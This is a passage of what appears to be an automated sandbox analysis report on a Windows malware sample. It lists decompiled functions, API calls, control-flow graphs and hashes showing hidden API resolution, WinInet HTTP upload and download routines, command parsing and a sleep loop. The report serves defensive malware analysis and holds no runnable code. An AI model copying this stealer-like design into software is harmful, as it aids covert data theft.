                                                  • GetProcAddress.KERNEL32(75FD0000,02D12680), ref: 0041A13B
                                                  • GetProcAddress.KERNEL32(734B0000,02D15B60), ref: 0041A160
                                                  • GetProcAddress.KERNEL32(734B0000,02D127E0), ref: 0041A179
                                                  • GetProcAddress.KERNEL32(734B0000,02D15CC8), ref: 0041A191
                                                  • GetProcAddress.KERNEL32(734B0000,02D48C48), ref: 0041A1A9
                                                  • GetProcAddress.KERNEL32(734B0000,02D48BD0), ref: 0041A1C2
                                                  • GetProcAddress.KERNEL32(734B0000,02D126E0), ref: 0041A1DA
                                                  • GetProcAddress.KERNEL32(734B0000,02D129C0), ref: 0041A1F2
                                                  • GetProcAddress.KERNEL32(734B0000,02D48BE8), ref: 0041A20B
                                                  • GetProcAddress.KERNEL32(763B0000,02D12880), ref: 0041A22C
                                                  • GetProcAddress.KERNEL32(763B0000,02D12940), ref: 0041A244
                                                  • GetProcAddress.KERNEL32(763B0000,02D48C00), ref: 0041A25D
                                                  • GetProcAddress.KERNEL32(763B0000,02D48C60), ref: 0041A275
                                                  • GetProcAddress.KERNEL32(763B0000,02D12800), ref: 0041A28D
                                                  • GetProcAddress.KERNEL32(750F0000,02D15B88), ref: 0041A2B3
                                                  • GetProcAddress.KERNEL32(750F0000,02D159A8), ref: 0041A2CB
                                                  • GetProcAddress.KERNEL32(750F0000,02D48C78), ref: 0041A2E3
                                                  • GetProcAddress.KERNEL32(750F0000,02D12820), ref: 0041A2FC
                                                  • GetProcAddress.KERNEL32(750F0000,02D12780), ref: 0041A314
                                                  • GetProcAddress.KERNEL32(750F0000,02D159D0), ref: 0041A32C
                                                  • GetProcAddress.KERNEL32(75A50000,02D48CC0), ref: 0041A352
                                                  • GetProcAddress.KERNEL32(75A50000,02D12920), ref: 0041A36A
                                                  • GetProcAddress.KERNEL32(75A50000,02D45BD0), ref: 0041A382
                                                  • GetProcAddress.KERNEL32(75A50000,02D48CD8), ref: 0041A39B
                                                  • GetProcAddress.KERNEL32(75A50000,02D48E40), ref: 0041A3B3
                                                  • GetProcAddress.KERNEL32(75A50000,02D12900), ref: 0041A3CB
                                                  • GetProcAddress.KERNEL32(75A50000,02D12840), ref: 0041A3E4
                                                  • GetProcAddress.KERNEL32(75A50000,02D48D80), ref: 0041A3FC
                                                  • GetProcAddress.KERNEL32(75A50000,02D48D98), ref: 0041A414
                                                  • GetProcAddress.KERNEL32(75070000,02D129A0), ref: 0041A436
                                                  • GetProcAddress.KERNEL32(75070000,02D48DB0), ref: 0041A44E
                                                  • GetProcAddress.KERNEL32(75070000,02D48DC8), ref: 0041A466
                                                  • GetProcAddress.KERNEL32(75070000,02D48E10), ref: 0041A47F
                                                  • GetProcAddress.KERNEL32(75070000,02D48E28), ref: 0041A497
                                                  • GetProcAddress.KERNEL32(74E50000,02D12860), ref: 0041A4B8
                                                  • GetProcAddress.KERNEL32(74E50000,02D12700), ref: 0041A4D1
                                                  • GetProcAddress.KERNEL32(75320000,02D128C0), ref: 0041A4F2
                                                  • GetProcAddress.KERNEL32(75320000,02D48DE0), ref: 0041A50A
                                                  • GetProcAddress.KERNEL32(6F060000,02D128A0), ref: 0041A530
                                                  • GetProcAddress.KERNEL32(6F060000,02D12740), ref: 0041A548
                                                  • GetProcAddress.KERNEL32(6F060000,02D12960), ref: 0041A560
                                                  • GetProcAddress.KERNEL32(6F060000,02D48DF8), ref: 0041A579
                                                  • GetProcAddress.KERNEL32(6F060000,02D126A0), ref: 0041A591
                                                  • GetProcAddress.KERNEL32(6F060000,02D12760), ref: 0041A5A9
                                                  • GetProcAddress.KERNEL32(6F060000,02D12660), ref: 0041A5C2
                                                  • GetProcAddress.KERNEL32(6F060000,02D126C0), ref: 0041A5DA
                                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                                  • GetProcAddress.KERNEL32(74E00000,02D49050), ref: 0041A629
                                                  • GetProcAddress.KERNEL32(74E00000,02D45B90), ref: 0041A641
                                                  • GetProcAddress.KERNEL32(74E00000,02D48ED0), ref: 0041A659
                                                  • GetProcAddress.KERNEL32(74E00000,02D49068), ref: 0041A672
                                                  • GetProcAddress.KERNEL32(74DF0000,02D127C0), ref: 0041A693
                                                  • GetProcAddress.KERNEL32(6C3C0000,02D49080), ref: 0041A6B4
                                                  • GetProcAddress.KERNEL32(6C3C0000,02D12720), ref: 0041A6CD
                                                  • GetProcAddress.KERNEL32(6C3C0000,02D48EE8), ref: 0041A6E5
                                                  • GetProcAddress.KERNEL32(6C3C0000,02D49110), ref: 0041A6FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                                  • API String ID: 2238633743-1775429166
                                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52
                                                  Function 00419860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                  APIs
                                                  • GetProcAddress.KERNEL32(75900000,02D17E40), ref: 004198A1
                                                  • GetProcAddress.KERNEL32(75900000,02D17E28), ref: 004198BA
                                                  • GetProcAddress.KERNEL32(75900000,02D17EB8), ref: 004198D2
                                                  • GetProcAddress.KERNEL32(75900000,02D17E58), ref: 004198EA
                                                  • GetProcAddress.KERNEL32(75900000,02D17E70), ref: 00419903
                                                  • GetProcAddress.KERNEL32(75900000,02D45BF0), ref: 0041991B
                                                  • GetProcAddress.KERNEL32(75900000,02D12480), ref: 00419933
                                                  • GetProcAddress.KERNEL32(75900000,02D12300), ref: 0041994C
                                                  • GetProcAddress.KERNEL32(75900000,02D17E88), ref: 00419964
                                                  • GetProcAddress.KERNEL32(75900000,02D17EA0), ref: 0041997C
                                                  • GetProcAddress.KERNEL32(75900000,02D17ED0), ref: 00419995
                                                  • GetProcAddress.KERNEL32(75900000,02D17E10), ref: 004199AD
                                                  • GetProcAddress.KERNEL32(75900000,02D12320), ref: 004199C5
                                                  • GetProcAddress.KERNEL32(75900000,02D45FF8), ref: 004199DE
                                                  • GetProcAddress.KERNEL32(75900000,02D45EA8), ref: 004199F6
                                                  • GetProcAddress.KERNEL32(75900000,02D12460), ref: 00419A0E
                                                  • GetProcAddress.KERNEL32(75900000,02D45E18), ref: 00419A27
                                                  • GetProcAddress.KERNEL32(75900000,02D45E30), ref: 00419A3F
                                                  • GetProcAddress.KERNEL32(75900000,02D12360), ref: 00419A57
                                                  • GetProcAddress.KERNEL32(75900000,02D45E48), ref: 00419A70
                                                  • GetProcAddress.KERNEL32(75900000,02D12380), ref: 00419A88
                                                  • LoadLibraryA.KERNEL32(02D46028,?,00416A00), ref: 00419A9A
                                                  • LoadLibraryA.KERNEL32(02D45D88,?,00416A00), ref: 00419AAB
                                                  • LoadLibraryA.KERNEL32(02D45F20,?,00416A00), ref: 00419ABD
                                                  • LoadLibraryA.KERNEL32(02D46010,?,00416A00), ref: 00419ACF
                                                  • LoadLibraryA.KERNEL32(02D45EC0,?,00416A00), ref: 00419AE0
                                                  • GetProcAddress.KERNEL32(75070000,02D46040), ref: 00419B02
                                                  • GetProcAddress.KERNEL32(75FD0000,02D45DA0), ref: 00419B23
                                                  • GetProcAddress.KERNEL32(75FD0000,02D45F38), ref: 00419B3B
                                                  • GetProcAddress.KERNEL32(75A50000,02D45D58), ref: 00419B5D
                                                  • GetProcAddress.KERNEL32(74E50000,02D124C0), ref: 00419B7E
                                                  • GetProcAddress.KERNEL32(76E80000,02D45CA0), ref: 00419B9F
                                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                                  Strings
                                                  • NtQueryInformationProcess, xrefs: 00419BAA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: NtQueryInformationProcess
                                                  • API String ID: 2238633743-2781105232
                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12
                                                  Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                  • StrCmpCA.SHLWAPI(?,02D4AE30), ref: 0040493A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,02D4AEA0), ref: 00404DE8
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                  • HttpOpenRequestA.WININET(00000000,02D4AF90,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00404B15
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                  • String ID: "$"$------$------$------
                                                  • API String ID: 2402878923-2180234286
                                                  • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                  • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                  • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                  • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                  Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1015 40635a 1012->1015 1016 40634e-406358 1012->1016 1013->1010 1018 406364-406392 HttpOpenRequestA 1015->1018 1016->1018 1020 4064f5-4064f9 InternetCloseHandle 1018->1020 1021 406398-40639c 1018->1021 1020->1013 1023 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1021->1023 1024 40639e-4063bf InternetSetOptionA 1021->1024 1026 406407-406427 call 41a740 call 41a800 * 2 1023->1026 1027 40642c-40644b call 418940 1023->1027 1024->1023 1026->1030 1034 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1034 1035 40644d-406454 1027->1035 1034->1030 1037 406456-406480 InternetReadFile 1035->1037 1038 4064c7-4064ef InternetCloseHandle 1035->1038 1041 406482-406489 1037->1041 1042 40648b 1037->1042 1038->1020 1041->1042 1047 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1041->1047 1042->1038 1047->1037
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                  • StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00406303
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                  • HttpOpenRequestA.WININET(00000000,GET,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00406385
                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                  • String ID: ERROR$ERROR$GET
                                                  • API String ID: 3074848878-2509457195
                                                  • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                  • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                                  Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1068 411817-41181a 1067->1068 1069 41199e-4119bd strtok_s 1067->1069 1071 411821-411830 call 41a820 1068->1071 1072 411849-411858 call 41a820 1068->1072 1073 4118ad-4118be StrCmpCA 1068->1073 1074 4118cf-4118e0 StrCmpCA 1068->1074 1075 41198f-411999 call 41a820 1068->1075 1076 4118f1-411902 StrCmpCA 1068->1076 1077 411951-411962 StrCmpCA 1068->1077 1078 411970-411981 StrCmpCA 1068->1078 1079 411913-411924 StrCmpCA 1068->1079 1080 411932-411943 StrCmpCA 1068->1080 1081 411835-411844 call 41a820 1068->1081 1082 41185d-41186e StrCmpCA 1068->1082 1083 41187f-411890 StrCmpCA 1068->1083 1069->1065 1071->1069 1072->1069 1085 4118c0-4118c3 1073->1085 1086 4118ca 1073->1086 1087 4118e2-4118e5 1074->1087 1088 4118ec 1074->1088 1075->1069 1089 411904-411907 1076->1089 1090 41190e 1076->1090 1095 411964-411967 1077->1095 1096 41196e 1077->1096 1098 411983-411986 1078->1098 1099 41198d 1078->1099 1091 411930 1079->1091 1092 411926-411929 1079->1092 1093 411945-411948 1080->1093 1094 41194f 1080->1094 1081->1069 1103 411870-411873 1082->1103 1104 41187a 1082->1104 1105 411892-41189c 1083->1105 1106 41189e-4118a1 1083->1106 1085->1086 1086->1069 1087->1088 1088->1069 1089->1090 1090->1069 1091->1069 1092->1091 1093->1094 1094->1069 1095->1096 1096->1069 1098->1099 1099->1069 1103->1104 1104->1069 1107 4118a8 1105->1107 1106->1107 1107->1069
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessstrtok_s
                                                  • String ID: block
                                                  • API String ID: 3407564107-2199623458
                                                  • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                  • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A
                                                  Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1171 1170->1164 1171->1164 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1184->1291 1192 415872-415879 1185->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1185->1193 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1201 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1200->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1193 1222->1127 1223->1291 1271->1164 1296->1193
                                                  APIs
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
